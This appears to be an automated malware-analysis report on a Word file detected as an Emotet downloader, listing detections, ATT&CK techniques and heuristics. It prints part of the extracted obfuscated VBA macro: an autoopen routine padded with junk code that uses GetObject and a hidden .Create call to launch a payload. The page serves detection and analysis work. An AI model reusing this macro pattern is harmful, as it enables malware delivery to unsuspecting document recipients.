MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6914197-0', indicating it is likely part of the Emotet family. Static analysis revealed the presence of a VBA macro with an autoopen function, which is a common execution vector for Emotet. The macro's obfuscated code, including a GetObject call, suggests it is designed to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6914197-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6914197-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14936 bytes |
SHA-256: ca18c7eca15ddd923ed0789af74ccd2762da72b340ce39e4f4d648c69e026257 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "F4oUXAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BGwAD1"
Attribute VB_Base = "0{75ED0DD9-AFB7-4BBE-9B43-B5CEF959467A}{169C0824-A931-42B7-8B7C-90176A97DA36}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "d_kDCBUA"
Attribute VB_Base = "0{827DDE68-7ADF-4EF2-AD66-4A072186267A}{0FA90AFB-7187-4285-827C-7AFE567C3109}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zXAAADAc"
Sub autoopen()
On Error Resume Next
Select Case NAxoZ_B
Case 552627650
PDAXAA = oAAAQAA / 827384356 / _
dAAAokBD - CInt(jQAA1o + CInt(498114999)) + _
(429428715 * CLng(983895741))
SoZ44o4 = 196175064 * iBAc1AoZ
WAQUA_c = 363782692 - 666563882 + _
123144297 - ZAXAQAAA / s_xUBA - Tan(986429207)
End Select
Select Case zBAU1kAA
Case 649585586
owBDAxAA = ZCA_BZ / 198442998 / _
oBADxA - CInt(OBAoABU + CInt(797539556)) + _
(239755694 * CLng(348758256))
wACC4ZA = 12786818 * f4ADDAoA
zAZwcA = 746862660 - 93594029 + _
932590376 - IXAACAC / LB_BAxw - Tan(355180009)
End Select
Select Case UXAAkD
Case 782412030
T_Z_DAA = XBCB4BAA / 720627370 / _
MDAAUo_ - CInt(wADCQD + CInt(942244244)) + _
(251421645 * CLng(769844241))
dCAAADBB = 259209376 * jAUD1A
MA_4AAAx = 779348900 - 235786462 + _
621967272 - fAQ1QB / Bo1AAG_ - Tan(239709486)
End Select
Set P41oAXA = GetObject(BGwAD1.wBQkAA + d_kDCBUA.T_DQQAZ + BGwAD1.wBQkAA)
Select Case u1BAQQXA
Case 30193339
cAwGAA = bUABABA / 362330586 / _
c1cccQx - CInt(VZBBAG + CInt(267226572)) + _
(492521700 * CLng(313397435))
YUC4AZA = 721346944 * ZUQC_AAB
jDAZBcQ = 816548745 - 903351210 + _
783641887 - WwcBADBZ / GwADxo - Tan(967269547)
End Select
Select Case QG_BkUU4
Case 342644650
YQCABAGU = aZAAkZ / 804034675 / _
ZAkCAAA - CInt(nAUAkCck + CInt(941343626)) + _
(65902322 * CLng(876627692))
DkZAAXA = 2007392 * ICBADBo
qCCo_4U = 301883740 - 939857073 + _
4276456 - dGA4xAAx / mBAQCQ - Tan(625025206)
End Select
Select Case kwCAABQA
Case 967000683
doACwB = UAXoZ1A / 792002400 / _
J4Uw1x1 - CInt(fc1XxD + CInt(452474668)) + _
(586971416 * CLng(799644976))
FABAAw = 485825059 * jAQZAQB
i1G_AU4 = 97368666 - 449027204 + _
186953635 - kBAwAk / WDQcAUAw - Tan(789194994)
End Select
P41oAXA.ShowWindow = 316725 - 316725
Select Case LcZGAUDU
Case 302811264
zZxABUU = J_okDA / 711472868 / _
A1ABkA - CInt(iAABAAc + CInt(207670542)) + _
(644429687 * CLng(146613637))
S4UUQQQ = 102044779 * vxAA14
TDAxAAB = 585167379 - 134492405 + _
652088754 - lGAUAU4Q / tQX1kAA - Tan(791221387)
End Select
Select Case NZ1QcAAc
Case 738526438
TAoxA_ = iAADAA / 156520915 / _
bkGoAA - CInt(NxAQAQAA + CInt(591200016)) + _
(504759482 * CLng(514821976))
PAABUC = 526043205 * uA4xAAA
hwAAAAZ = 414864541 - 975938851 + _
921707971 - GA4GwX / a1DQQk_ - Tan(947754572)
End Select
Select Case QA_AxX
Case 303487230
RBUAAkQA = vcCDxU / 659205021 / _
aGAxAAXC - CInt(d_wDGAoA + CInt(55786465)) + _
(911374040 * CLng(809257077))
HDxwUAAZ = 355880773 * XDxBc14
lA4G4A1 = 139668389 - 640127231 + _
603418556 - zcXCAQAA / LQGA4QA - Tan(776835008)
End Select
GetObject(BGwAD1.wBQkAA + d_kDCBUA.JcZXQCBB + BGwAD1.wBQkAA) _
.Create BGwAD1.wBQkAA + d_kDCBUA.RDBZUD + BGwAD1.wBQkAA + d_kDCBUA.kk_cwA + BGwAD1.wBQkAA + BGwAD1.wBQkAA + d_kDCBUA.bwCZZ_4 + BGwAD1.wBQkAA + BGwAD1.wBQ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.